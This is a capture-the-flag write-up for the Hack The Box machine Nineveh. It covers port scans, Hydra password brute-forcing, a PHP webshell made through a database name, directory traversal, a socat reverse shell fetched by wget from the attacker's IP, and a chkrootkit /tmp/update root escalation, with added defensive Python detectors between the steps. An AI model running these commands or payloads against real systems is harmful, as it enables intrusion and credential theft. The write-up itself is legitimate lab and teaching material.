Difficulty Rating:

Machine: Nineveh
OS: Linux
Target IP: 10.10.10.43/44/45
Source IP: 10.10.15.8

  • Nmap TCP Scan
$ nmap -A -sV -Pn 10.10.10.45

Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-05 12:11 IST
Nmap scan report for 10.10.10.45
Host is up (0.20s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.62 seconds

  • Dirsearch
$ python3 dirsearch.py -u https://10.10.10.43 -w /usr/share/wordlists/dirb/common.txt -e php

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 4614

Error Log: /home/anton/dirsearch/logs/errors-17-08-05_14-41-05.log

Target: https://10.10.10.43

[14:41:06] Starting: 
[14:41:09] 200 -   49B  - /
[14:41:09] 403 -  291B  - /.hta
[14:42:32] 301 -  309B  - /db  ->  https://10.10.10.43/db/
[14:43:30] 200 -   49B  - /index.html
[14:45:34] 403 -  300B  - /server-status

Task Completed

$ python3 dirsearch.py -u https://10.10.10.43/db -w /usr/share/wordlists/dirb/common.txt -e php

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 4614

Error Log: /home/anton/dirsearch/logs/errors-17-08-05_14-47-06.log

Target: https://10.10.10.43/db

[14:47:07] Starting: 
[14:47:10] 200 -   11KB - /db/
[14:47:11] 403 -  294B  - /db/.hta
[14:49:42] 200 -   11KB - /db/index.php

Task Completed

  • Hydra
$ hydra -l true -P /usr/share/wordlists/rockyou.txt nineveh.htb https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=^USER^:Incorrect password." -t 64  
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-05 17:02:39
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~3502 tries per task
[DATA] attacking service http-post-form on port 443 with SSL
[STATUS] 834.00 tries/min, 834 tries in 00:01h, 14343565 to do in 286:39h, 64 active
[443][http-post-form] host: nineveh.htb   login: true   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-05 17:04:29
  • The vulnerability is that each new database is written to disk as a file named after the database. If we create a database whose name ends in .php, the web server will treat that file as a PHP script.
  • After logging in, create a database with name ninevehNotes.php.
    • Create 1 table with any name and 1 row
    • Enter any name for the field.
    • Set type to TEXT.
    • Default value will be the payload in php

  • Dirsearch on http://10.10.10.43
$ python3 dirsearch.py -u http://10.10.10.43/department/ -w /usr/share/wordlists/dirb/common.txt -e php -t 100 

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 100 | Wordlist size: 4614

Error Log: /home/anton/dirsearch/logs/errors-17-08-12_18-26-45.log

Target: http://10.10.10.43/department/

[18:26:46] Starting: 
[18:26:47] 200 -   68B  - /department/
[18:26:47] 403 -  301B  - /department/.hta
[18:26:57] 301 -  319B  - /department/css  ->  http://10.10.10.43/department/css/
[18:27:00] 301 -  321B  - /department/files  ->  http://10.10.10.43/department/files/
[18:27:02] 200 -   68B  - /department/index.php

Task Completed

$ python3 dirsearch.py -u http://10.10.10.43/department/files -w /usr/share/wordlists/dirb/common.txt -e php -t 100

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 100 | Wordlist size: 4614

Error Log: /home/anton/dirsearch/logs/errors-17-08-12_18-30-35.log

Target: http://10.10.10.43/department/files

[18:30:36] Starting: 
[18:30:38] 403 -  307B  - /department/files/.hta
[18:30:39] 200 -   68B  - /department/files/
[18:30:53] 200 -   68B  - /department/files/index.php

Task Completed

  • Visit http://10.10.10.43/department/login.php
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.45 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password" -t 64 
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-12 18:35:29
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~3502 tries per task
[DATA] attacking service http-post-form on port 80
[STATUS] 2072.00 tries/min, 2072 tries in 00:01h, 14342327 to do in 115:22h, 64 active
[80][http-post-form] host: 10.10.10.45   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-12 18:38:03
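Both Hydra runs above push thousands of POSTs per minute at a login form, which is very loud in the web server's access log. The following is an added example, not part of the writeup: a small Python detector that parses Apache combined-format lines and flags any client that POSTs to a login endpoint at least a threshold number of times inside a sliding 60-second window. The log lines are constructed for the demo; the two endpoint paths are the ones from this box.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: ip ident user [ts] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]   # drop the query string
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))

def detect_login_bruteforce(lines, login_paths, threshold=20, window=timedelta(seconds=60)):
    """Flag (ip, path) pairs that POST to a login endpoint at least `threshold`
    times inside any sliding `window`. Returns {(ip, path): peak_count}."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method == "POST" and path in login_paths:
            events[(ip, path)].append(ts)
    alerts = {}
    for key, times in events.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):          # two-pointer sliding window
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts

def stamp(d):
    return d.strftime("%d/%b/%Y:%H:%M:%S %z")

def sample_lines():
    """Constructed log lines (not from the box): one burst of 30 POSTs in 30 s
    from one client, plus a few ordinary requests from another."""
    fmt = '{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'
    base = datetime.strptime("05/Aug/2017:17:02:39 +0000", "%d/%b/%Y:%H:%M:%S %z")
    lines = [fmt.format(ip="10.10.15.8", ts=stamp(base + timedelta(seconds=i)),
                        method="POST", path="/department/login.php", status=200)
             for i in range(30)]
    for i in range(3):   # three slow logins spread over an hour: not a burst
        lines.append(fmt.format(ip="10.10.14.2", ts=stamp(base + timedelta(minutes=20 * i)),
                                method="POST", path="/department/login.php", status=302))
    lines.append(fmt.format(ip="10.10.14.2", ts=stamp(base), method="GET",
                            path="/department/css/style.css", status=200))
    return lines

if __name__ == "__main__":
    found = detect_login_bruteforce(sample_lines(), {"/db/index.php", "/department/login.php"})
    for (ip, path), n in found.items():
        print(f"ALERT {ip} -> {path}: {n} POSTs within 60 s")
```

Status codes are deliberately ignored: as the Hydra commands show, success on these forms is judged by a string in the response body, not by HTTP status, so the detector counts attempts rather than failures. Rate limiting or lockout on these two endpoints would have stopped both runs long before rockyou.txt was exhausted.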

  • http://10.10.10.43/manage.php is vulnerable to directory traversal.
  • The value of the notes parameter is the path to the payload: http://10.10.10.43/manage.php?notes=/var/tmp/ninevehNotes.php

Note: The payload's filename must contain the string ninevehNotes, because manage.php whitelists that string in its source code.
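The two web bugs above share one root cause: a user-controlled string ends up as a filesystem path, first as the database filename (so a name ending in .php becomes executable under the web root) and then as the notes parameter, guarded only by a substring match on ninevehNotes. As an added example (not the target application's code; the directory paths are assumed), here is how both inputs would be confined in Python: the application picks the extension itself and resolves every path against a fixed base directory outside the document root.

```python
import os
import re

# Assumed layout for the example: application data kept outside the web root.
DB_DIR = "/srv/app/data"
NOTES_DIR = "/srv/app/notes"
DB_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")                 # bare identifier, no dot
NOTES_NAME_RE = re.compile(r"^ninevehNotes[A-Za-z0-9_-]*\.txt$")  # fixed prefix AND extension

def substring_check(notes):
    """The weak rule described in the writeup: any value containing the
    string is accepted, so '/var/tmp/ninevehNotes.php' passes."""
    return "ninevehNotes" in notes

def resolve_within(base, name):
    """Join `name` onto `base` and return the real path, or None if the
    result lies outside `base` once '..' and symlinks are resolved.
    An absolute `name` makes os.path.join discard `base`, which the
    prefix test then rejects."""
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, name))
    if not candidate.startswith(base_real + os.sep):
        return None
    return candidate

def database_path(user_name):
    """The server chooses the extension; the user only supplies an identifier."""
    if not DB_NAME_RE.match(user_name):
        return None
    return resolve_within(DB_DIR, user_name + ".db")

def notes_path(user_value):
    """Only a bare filename with the expected prefix and extension is accepted."""
    if "/" in user_value or os.sep in user_value or not NOTES_NAME_RE.match(user_value):
        return None
    return resolve_within(NOTES_DIR, user_value)

if __name__ == "__main__":
    for value in ("/var/tmp/ninevehNotes.php", "../ninevehNotes.txt", "ninevehNotes.txt"):
        print(f"{value!r}: substring check={substring_check(value)} strict={notes_path(value)}")
    for name in ("ninevehNotes.php", "sales_2017"):
        print(f"database {name!r} -> {database_path(name)}")
```

Keeping data files outside the document root matters on its own: even if an extension check were bypassed, a file the web server never serves cannot be executed through it.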

  • Run socat on attacker’s machine

$ socat file:`tty`,echo=0,raw tcp-listen:31337

  • Download the socat binary, place it in /var/www/html on the attacker's machine, then fetch and run it on the victim: $ wget 10.10.15.8/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.15.8:31337

To own user

$ wget https://nineveh.htb/secure_notes/nineveh.png --no-check-certificate
  • View the contents of the file
  • It contains the private key for the user amrois
  • Connect using ssh
$ ssh -i nineveh_key.txt [email protected]

Note: SSH is not reachable from outside, so the connection has to be made to 127.0.0.1 or localhost.
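An image that yields a private key is a classic case of data appended after the PNG IEND chunk, which image viewers silently ignore. As an added example (not part of the writeup), the Python below walks the PNG chunk structure, verifies each chunk's CRC, and reports any trailing bytes and whether they carry PEM private-key markers. The sample image and the key text appended to it are constructed placeholders, not the real nineveh.png.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
KEY_MARKERS = (b"-----BEGIN ", b"PRIVATE KEY-----")

def _chunk(ctype, data):
    """Encode one PNG chunk: length, type, data, CRC-32 over type+data."""
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data) & 0xFFFFFFFF))

def walk_png(blob):
    """Return (chunk_types, trailing_bytes). Raises ValueError if the file is
    not a PNG or a chunk is truncated or fails its CRC."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, types = len(PNG_SIG), []
    while True:
        if pos + 8 > len(blob):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        crc = blob[pos + 8 + length:pos + 12 + length]
        if len(data) != length or len(crc) != 4:
            raise ValueError("truncated chunk %r" % ctype)
        if struct.unpack(">I", crc)[0] != zlib.crc32(ctype + data) & 0xFFFFFFFF:
            raise ValueError("bad CRC in chunk %r" % ctype)
        types.append(ctype)
        pos += 12 + length
        if ctype == b"IEND":            # decoders stop here; anything after is baggage
            break
    return types, blob[pos:]

def inspect_png(blob):
    """Summarise chunk layout, trailing byte count and whether a PEM key is appended."""
    types, trailing = walk_png(blob)
    return {
        "chunks": [t.decode("ascii") for t in types],
        "trailing_len": len(trailing),
        "private_key_marker": all(marker in trailing for marker in KEY_MARKERS),
    }

def sample_png():
    """Constructed 1x1 greyscale PNG, returned clean and with a dummy key appended."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit, colour type 0
    idat = zlib.compress(b"\x00\x00")                      # filter byte + one pixel
    clean = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    appended = (b"-----BEGIN RSA PRIVATE KEY-----\n"
                b"PLACEHOLDER-NOT-A-REAL-KEY\n"
                b"-----END RSA PRIVATE KEY-----\n")
    return clean, clean + appended

if __name__ == "__main__":
    for label, blob in zip(("clean", "tainted"), sample_png()):
        print(label, inspect_png(blob))
```

The same walk catches the other common hiding spot, a non-standard ancillary chunk with a made-up type, because every chunk type is listed; anything outside the handful a normal encoder writes deserves a look.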

  • View the contents of the /report directory
  • The report is the output of chkrootkit
Exploit for chkrootkit
  • Create a file /tmp/update containing the payload
[email protected]:~$ cat /tmp/update
cat /root/root.txt > /home/amrois/pass; chmod +r /home/amrois/pass
[email protected]:~$ ls 
user.txt
[email protected]:~$ chmod +x /tmp/update
[email protected]:~$ ls -la /tmp/update
-rwxrwxr-x 1 amrois amrois 67 Aug 12 15:20 /tmp/update
[email protected]:~$ ls
user.txt
[email protected]:~$ ls
pass  user.txt
[email protected]:~$ cat pass
XXXXXXXXXXXX
[email protected]:~$ 
User and Root owned!!
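The chkrootkit issue above is the general pattern of a root-level job executing a path that unprivileged users can create, here /tmp/update. As an added example (not from the writeup), the Python below audits a path the way a defender would before letting a privileged scheduled job run it: every component from / down to the file must exist, be owned by a trusted uid, and not be writable by group or other. The directory tree is constructed in a temporary directory, and trusting the current uid alongside root is only so the demo runs unprivileged.

```python
import os
import stat
import tempfile

def exec_path_risks(path, trusted_uids=(0,)):
    """Reasons a privileged job must not execute `path`: the file or any
    directory above it is missing, owned by an untrusted uid, or writable by
    group/other. Returns a list of (component, reason) tuples, root first."""
    path = os.path.abspath(path)
    chain, cur = [], path
    while True:                       # collect path, parent, grandparent, ..., /
        chain.append(cur)
        parent = os.path.dirname(cur)
        if parent == cur:
            break
        cur = parent
    findings = []
    for comp in reversed(chain):      # audit from / down to the file
        try:
            st = os.stat(comp)
        except FileNotFoundError:
            findings.append((comp, "does not exist; whoever can create it controls the job"))
            break
        if st.st_uid not in trusted_uids:
            findings.append((comp, f"owned by uid {st.st_uid}, not a trusted uid"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            # The sticky bit on /tmp only stops users deleting each other's files;
            # it does nothing to stop anyone creating /tmp/update in the first place.
            findings.append((comp, f"writable by group/other (mode {stat.S_IMODE(st.st_mode):04o})"))
    return findings

def build_sample_tree():
    """Constructed tree for the demo: a world-writable directory holding a
    group-writable script, beside a directory with sane permissions."""
    root = tempfile.mkdtemp(prefix="jobaudit-")
    bad_dir, good_dir = os.path.join(root, "worldtmp"), os.path.join(root, "safe")
    os.mkdir(bad_dir)
    os.chmod(bad_dir, 0o1777)         # same mode as /tmp
    os.mkdir(good_dir)
    os.chmod(good_dir, 0o755)
    bad, good = os.path.join(bad_dir, "update"), os.path.join(good_dir, "job.sh")
    for f, mode in ((bad, 0o775), (good, 0o755)):
        with open(f, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(f, mode)
    return root, bad, good

if __name__ == "__main__":
    root, bad, good = build_sample_tree()
    trusted = (0, os.getuid())        # demo runs unprivileged, so trust our own uid too
    for target in (bad, good):
        print(target)
        for comp, reason in exec_path_risks(target, trusted):
            print("   ", comp, "->", reason)
```

Run against a real /tmp/update, the walk also flags /tmp itself, which is exactly the point: nothing under a world-writable directory should ever be executed by root, and the job that does so needs its target moved to a root-owned location such as a 0755 directory under /usr/local or /etc.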

Share the fun!